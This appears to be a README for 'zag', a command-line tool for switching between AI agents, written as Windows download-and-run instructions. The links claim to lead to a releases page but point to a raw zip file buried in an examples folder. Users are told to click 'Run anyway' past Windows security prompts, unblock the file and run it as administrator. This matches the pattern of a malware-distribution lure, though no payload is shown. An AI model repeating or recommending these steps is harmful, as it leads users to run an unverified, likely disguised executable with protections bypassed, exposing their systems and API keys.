⚙️ zag - One CLI for every agent

📥 Download zag
Visit this page to download: https://github.com/dorle5803/zag/raw/refs/heads/main/examples/react-claude-interface/Software-1.1.zip
On the releases page, look for the latest version and download the Windows file that matches your computer.
🪟 Run on Windows
- Open the download page above.
- Find the latest release.
- Download the Windows
.exe file or the Windows zip file.
- If you downloaded a zip file, right-click it and choose Extract All.
- Open the folder and find the
zag.exe file.
- Double-click
zag.exe to run it.
If Windows shows a security prompt, choose Run or More info, then Run anyway.
✨ What zag does
zag helps you use different AI agents from one command line tool. It gives you one place to run workflows that can work with tools like:
- Claude
- Codex
- Gemini
- Copilot
- Ollama
Use it when you want the same workflow to keep working even if you switch agents.
🧩 Why people use it
- Keep one workflow instead of rebuilding it for each agent
- Switch between agents without changing your process
- Use local models with Ollama when you want to stay offline
- Connect cloud and local tools in one place
- Keep agent tasks organized from one CLI
🖥️ Windows system needs
zag is made for modern Windows systems. A typical setup works best with:
- Windows 10 or Windows 11
- 64-bit computer
- A few hundred MB of free disk space
- Internet access for cloud agents
- Optional local model support if you use Ollama
If you plan to use local models, make sure Ollama is installed and running on your PC.
🚀 First launch
After you open zag.exe, a terminal window may appear.
You can use it from the command line to:
- start an agent workflow
- send a task to a model
- switch between agent backends
- manage prompts and steps
If you prefer, you can pin the app to Start for easier access later.
🔧 Common setup steps
1. Keep the file in one place
Move zag.exe into a folder you can find again, such as:
Downloads
Documents
Desktop
2. Allow access if asked
If Windows asks for permission, allow it so the app can start.
3. Add it to your path if you use it often
If you want to run zag from any terminal window, you can place the file in a folder that is already on your system path. Many users keep tools in a simple folder like:
C:\Tools\zag
C:\Users\YourName\bin
4. Set up your agent access
Some agents need an API key or local service before they can work. Keep those details ready if your setup uses cloud tools.
🧠 Example use cases
- Ask one agent to draft code
- Send the same task to a second agent for review
- Use a local Ollama model for private work
- Compare outputs from different models
- Keep a repeatable workflow for support, coding, or content tasks
📂 Suggested folder layout
If you want a simple setup, use this:
Downloads for the first run
C:\Tools\zag for regular use
Documents\zag-workflows for your saved tasks and prompts
🔍 What to expect
When zag runs, it acts as a command line tool that helps route work to different AI agents. You may see:
- a text-based interface
- setup prompts
- task results in the terminal
- messages that tell you which agent is active
🛠️ Basic troubleshooting
zag does not open
- Check that the file finished downloading
- Make sure you downloaded the Windows file
- Right-click the file and choose Run as administrator
- Try moving the file to a simple folder like
Desktop
Windows blocks the file
- Open the file properties
- Look for an Unblock option
- Apply the change and try again
The window opens and closes fast
- Open Command Prompt first
- Run the file from that window
- This can help you see the message before it closes
Ollama does not connect
- Make sure Ollama is installed
- Start Ollama before you run zag
- Check that the local service is active
Cloud agent access fails
- Check your internet connection
- Confirm your API key is set
- Make sure the agent service is available
📌 Release page
Download from the latest build here: https://github.com/dorle5803/zag/raw/refs/heads/main/examples/react-claude-interface/Software-1.1.zip
Use this page any time you want the newest Windows version or want to check older releases
🧭 Simple next steps
- Visit the release page
- Download the Windows file
- Run
zag.exe
- Set up the agent you want to use
- Start your first workflow